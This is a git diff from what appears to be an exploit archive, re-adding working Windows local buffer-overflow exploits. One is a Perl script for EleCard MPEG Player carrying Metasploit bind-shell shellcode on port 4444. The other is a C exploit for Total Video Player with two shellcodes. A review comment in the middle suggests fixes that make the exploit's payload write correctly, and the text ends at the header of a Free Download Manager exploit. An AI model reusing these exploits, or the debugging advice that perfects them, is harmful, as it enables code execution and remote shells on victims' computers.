-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x53\x46\x35\x46\x42\x4a\x52\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48". -"\x49\x38\x4e\x46\x46\x42\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d". 
-"\x46\x36\x4b\x58\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48". -"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56". -"\x50\x38\x50\x54\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46". -"\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x57". -"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e". -"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x48\x45\x4e". -"\x48\x56\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50". -"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35". -"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x45\x43\x45\x43\x54". -"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x41". -"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x49\x4a\x46\x46\x4a". -"\x4c\x41\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41". -"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32". -"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d". -"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x35\x4f\x4f\x48\x4d". -"\x42\x45\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46". -"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45". -"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x56". -"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x55\x49\x35\x49\x52\x4e\x4c". -"\x49\x38\x47\x4e\x4c\x36\x46\x54\x49\x48\x44\x4e\x41\x33\x42\x4c". -"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x54\x4e\x52". -"\x43\x59\x4d\x58\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36". -"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f". -"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x46". -"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56". -"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46". -"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f". -"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d". 
-"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x55\x43\x35\x4f\x4f\x48\x4d". -"\x4f\x4f\x42\x4d\x5a"; - -my $exploit = $buff.$ret.$nop.$shellcode; -print "[+] Creating Evil File" ; -open(blah, ">>$file") or die "Cannot open $file"; -print blah $exploit; -close(blah); -print "\n[+] Please wait while creating $file"; -print "\n[+] $file has been created"; - -# milw0rm.com [2009-01-25] +#!/usr/bin/perl +# By ALpHaNiX +# NullArea.Net +# THanks +#EAX 00000000 +#ECX 41414141 +#EDX 775A104D +#EBX 00000000 +#ESP 0012C280 +#EBP 0012C2A0 +#ESI 00000000 +#EDI 00000000 +#EIP 41414141 + +system("color 5"); + +if (@ARGV != 1) { &help; exit(); } + +sub help(){ + print "[X] Usage : ./exploit.pl filename \n"; +} + +{ $file = $ARGV[0]; } +print "\n [X]*************************************************\n"; +print " [X]EleCard MPEG PLAYER Local Stack Overflow Exploit *\n"; +print " [X] Coded By AlpHaNiX *\n"; +print " [X] From Null Area [NullArea.Net] *\n"; +print " [X]**************************************************\n\n"; + +print "[+] Exploiting.....\n" ; + +my $buff="http://"."\x41" x 969 ; +my $nop ="\x90" x 6000 ; +my $ret ="\xB3\x37\x8D\x6E" ; # JMP ESP In DDRAW.Dll In Windows +Vista Ultimate English + +# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum +http://metasploit.com +my $shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e". +"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58". +"\x4e\x36\x46\x52\x46\x42\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x37". +"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58". +"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x53\x4b\x58". +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c". 
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x53\x46\x35\x46\x42\x4a\x52\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48". +"\x49\x38\x4e\x46\x46\x42\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d". +"\x46\x36\x4b\x58\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48". +"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56". +"\x50\x38\x50\x54\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46". +"\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x57". +"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e". +"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x48\x45\x4e". +"\x48\x56\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50". +"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35". +"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x45\x43\x45\x43\x54". +"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x41". +"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x49\x4a\x46\x46\x4a". +"\x4c\x41\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41". +"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32". +"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d". +"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x35\x4f\x4f\x48\x4d". +"\x42\x45\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46". +"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45". +"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x56". +"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x55\x49\x35\x49\x52\x4e\x4c". +"\x49\x38\x47\x4e\x4c\x36\x46\x54\x49\x48\x44\x4e\x41\x33\x42\x4c". +"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x54\x4e\x52". +"\x43\x59\x4d\x58\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36". +"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f". 
+"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x46". +"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56". +"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46". +"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f". +"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d". +"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x55\x43\x35\x4f\x4f\x48\x4d". +"\x4f\x4f\x42\x4d\x5a"; + +my $exploit = $buff.$ret.$nop.$shellcode; +print "[+] Creating Evil File" ; +open(blah, ">>$file") or die "Cannot open $file"; +print blah $exploit; +close(blah); +print "\n[+] Please wait while creating $file"; +print "\n[+] $file has been created"; + +# milw0rm.com [2009-01-25] diff --git a/platforms/windows/local/79.c b/platforms/windows/local/79.c index 2ef30e766..8957867d8 100755 --- a/platforms/windows/local/79.c +++ b/platforms/windows/local/79.c @@ -146,6 +146,6 @@ SendMessage( hWndChild, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a ); return 0; -} - -// milw0rm.com [2003-08-13] +} + +// milw0rm.com [2003-08-13] diff --git a/platforms/windows/local/7923.c b/platforms/windows/local/7923.c index 7c3de3567..707468b28 100755 --- a/platforms/windows/local/7923.c +++ b/platforms/windows/local/7923.c 
@@ -1,137 +1,137 @@ -/*simo36.tvp-bof.c -Authour : SimO-s0fT -Home : www.exploiter-ma.com -greetz to : Allah , mr.5rab , Sup3r crystal , Hack Back , Al Alame , all arab4services.net and friends -bahjawi danger khod nasi7a - - - -EAX 0034F928 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -ECX 00004141 -EDX 00340608 -EBX 41414141 -ESP 0012BF44 -EBP 0012C160 -ESI 0034F920 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -EDI 41414141 -EIP 7C92B3FB ntdll.7C92B3FB - - - -*/ - - -#include<stdio.h> -#include <stdlib.h> -#include <string.h> -#include<windows.h> - -#define OFFSET 549 -char twacha[]="\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46" -"\x3a\x33\x3a\x35\x30\x2c\x2d\x4d\x6f\x68\x61\x6d\x65\x64\x20\x47" -"\x68\x61\x6e\x6e\x61\x6d\x20\x2d\x20\x44\x41\x4f\x55\x44\x49\x20" -"\x34\x45\x56\x45\x52\x0d\x0a\x44\x3a\x5c"; - -char scode1[]= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" -"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47" -"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38" -"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48" -"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58" 
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44" -"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38" -"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" -"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47" -"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a" -"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b" -"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53" -"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57" -"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39" -"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46" -"\x4e\x46\x43\x36\x42\x50\x5a"; - -char scode2[]= -"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50" -"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f" -"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b" -"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09" -"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8" -"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b" -"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b" -"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0" -"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40" -"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92" -"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3" -"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71" -"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8" -"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9" -"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7" -"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0" -"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd" -"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f" 
-"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1" -"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40" -"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3" -"\x03\x75\x2c\x6f\x80\x8a\xfa\x90"; - - - - -int main(int argc,char *argv[]){ - FILE *openfile; - unsigned char *buffer; - unsigned int offset=0; - unsigned int RET=0x7c85d568; - int number=0; - printf("*********************************************************\n"); - printf("Total Video Player local universal buffer overflow exploit\n"); - printf("Cded by SimO-s0fT(simo_at_exploiter-ma.com)"); - printf("greetz : to Allah \n"); - printf("this exploit is for my best friends : Sup3r-crystal & mr.5rab & Hack back\n"); - printf("***********************************************************\n"); - scanf("%d",&number); - if((openfile=fopen(argv[1],"wb"))==NULL){ - perror("connot opening .....!!\n"); - exit(0); - } - switch(number){ - case 1: buffer = (unsigned char *) malloc (OFFSET+strlen(scode1)+sizeof(RET)); - memset(buffer,0x90,OFFSET+strlen(scode1)+sizeof(RET)); - offset=OFFSET; - memcpy(buffer+offset,&RET,sizeof(RET)-1); - offset+=sizeof(RET); - memcpy(buffer+offset,scode1,strlen(scode1)); - offset+=strlen(scode1); - fputs(twacha,openfile); - fputs(buffer,openfile); - fclose(openfile); - printf("File created ....!\n" - "open it with tvp\n"); - break; - - case 2: buffer = (unsigned char*) malloc(OFFSET+strlen(scode2)+sizeof(RET)); - memset(buffer,0x90,OFFSET+strlen(scode2)+sizeof(RET)); - offset = OFFSET; - memcpy(buffer+offset,&RET,sizeof(RET)-1); - offset+=sizeof(RET); - memcpy(buffer+offset,scode2,strlen(scode2)); - offset=strlen(scode2); - fputs(twacha,openfile); - fputs(buffer,openfile); - fclose(openfile); - printf("File created ....!\n" - "open it with tvp\n"); - break; - } - - free(buffer); - return 0; -} - -// milw0rm.com [2009-01-29] +/*simo36.tvp-bof.c +Authour : SimO-s0fT +Home : www.exploiter-ma.com +greetz to : Allah , mr.5rab , Sup3r crystal , Hack Back 
, Al Alame , all arab4services.net and friends +bahjawi danger khod nasi7a + + + +EAX 0034F928 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +ECX 00004141 +EDX 00340608 +EBX 41414141 +ESP 0012BF44 +EBP 0012C160 +ESI 0034F920 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +EDI 41414141 +EIP 7C92B3FB ntdll.7C92B3FB + + + +*/ + + +#include<stdio.h> +#include <stdlib.h> +#include <string.h> +#include<windows.h> + +#define OFFSET 549 +char twacha[]="\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46" +"\x3a\x33\x3a\x35\x30\x2c\x2d\x4d\x6f\x68\x61\x6d\x65\x64\x20\x47" +"\x68\x61\x6e\x6e\x61\x6d\x20\x2d\x20\x44\x41\x4f\x55\x44\x49\x20" +"\x34\x45\x56\x45\x52\x0d\x0a\x44\x3a\x5c"; + +char scode1[]= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" +"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47" +"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38" +"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48" +"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58" +"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44" +"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38" 
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" +"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47" +"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a" +"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b" +"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53" +"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57" +"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39" +"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46" +"\x4e\x46\x43\x36\x42\x50\x5a"; + +char scode2[]= +"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50" +"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f" +"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b" +"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09" +"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8" +"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b" +"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b" +"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0" +"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40" +"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92" +"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3" +"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71" +"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8" +"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9" +"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7" +"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0" +"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd" +"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f" +"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1" +"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40" 
+"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
+"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
+
+
+
+
+int main(int argc,char *argv[]){
+ FILE *openfile;
+ unsigned char *buffer;
+ unsigned int offset=0;
+ unsigned int RET=0x7c85d568;
+ int number=0;
+ printf("*********************************************************\n");
+ printf("Total Video Player local universal buffer overflow exploit\n");
+ printf("Cded by SimO-s0fT(simo_at_exploiter-ma.com)");
+ printf("greetz : to Allah \n");
+ printf("this exploit is for my best friends : Sup3r-crystal & mr.5rab & Hack back\n");
+ printf("***********************************************************\n");
+ scanf("%d",&number);
+ if((openfile=fopen(argv[1],"wb"))==NULL){
+ perror("connot opening .....!!\n");
+ exit(0);
+ }
+ switch(number){
+ case 1: buffer = (unsigned char *) malloc (OFFSET+strlen(scode1)+sizeof(RET));
+ memset(buffer,0x90,OFFSET+strlen(scode1)+sizeof(RET));
+ offset=OFFSET;
+ memcpy(buffer+offset,&RET,sizeof(RET)-1);
+ offset+=sizeof(RET);
+ memcpy(buffer+offset,scode1,strlen(scode1));
+ offset+=strlen(scode1);
+ fputs(twacha,openfile);
+ fputs(buffer,openfile);
+ fclose(openfile);
+ printf("File created ....!\n"
+ "open it with tvp\n");
+ break;
+
+ case 2: buffer = (unsigned char*) malloc(OFFSET+strlen(scode2)+sizeof(RET));
+ memset(buffer,0x90,OFFSET+strlen(scode2)+sizeof(RET));
+ offset = OFFSET;
+ memcpy(buffer+offset,&RET,sizeof(RET)-1);
+ offset+=sizeof(RET);
+ memcpy(buffer+offset,scode2,strlen(scode2));
+ offset=strlen(scode2);
+ fputs(twacha,openfile);
+ fputs(buffer,openfile);
+ fclose(openfile);
+ printf("File created ....!\n"
+ "open it with tvp\n");
+ break;
+ }
+
+ free(buffer);
+ return 0;
+}
+
+// milw0rm.com [2009-01-29]
diff --git a/platforms/windows/local/7957.pl b/platforms/windows/local/7957.pl
index af4bc2dea..4417a6f67 100755
--- a/platforms/windows/local/7957.pl
+++ b/platforms/windows/local/7957.pl
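Review bot: In main() on the new side, both `memcpy(buffer+offset,&RET,sizeof(RET)-1);` calls (case 1 and case 2) copy only three of the four bytes of RET, so the fourth byte of the return-address slot written to the file is the 0x90 filler left by memset rather than the intended 0x7c; it should be `memcpy(buffer+offset,&RET,sizeof(RET));`. `fputs(buffer,openfile)` is also wrong here: buffer is a malloc'd block filled with 0x90 and shellcode bytes with no NUL terminator, so fputs reads past the allocation and appends an unpredictable tail — `fwrite(buffer,1,OFFSET+strlen(scode1)+sizeof(RET),openfile);` (and the scode2 equivalent in case 2) writes exactly the intended payload. `unsigned char *buffer;` is uninitialized yet `free(buffer)` runs for any `number` other than 1 or 2, and argv[1] is dereferenced without an argc check; `unsigned char *buffer=NULL;` and an `if(argc<2)` guard before the fopen would close both. This hunk only rewrites line endings, so these defects predate the commit, but the file is being re-added wholesale and is the code under review.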
@@ -1,94 +1,94 @@
-#!/usr/bin/perl
-#
-# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
-# -----------------------------------------------------------
-# Exploit by SkD (skdrat@hotmail.com)
-#
-# Vendors URL =
-# [www.freedownloadmanager.org]
-# Download FDM 3.0 Build 844 =
-# [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html]
-# (Downloaded by over 1.6 million users!)
-#
-# This is another one of the more advanced exploitation methods
-# for buffer overflows using my method called "shell building".
-# It utilizes a SEH overflow and then a shellcode builder/assembler
-# "builds"/or "assembles" bytes that were deleted by transformation
-# of the buffer so that the shellcode will work without a flaw.
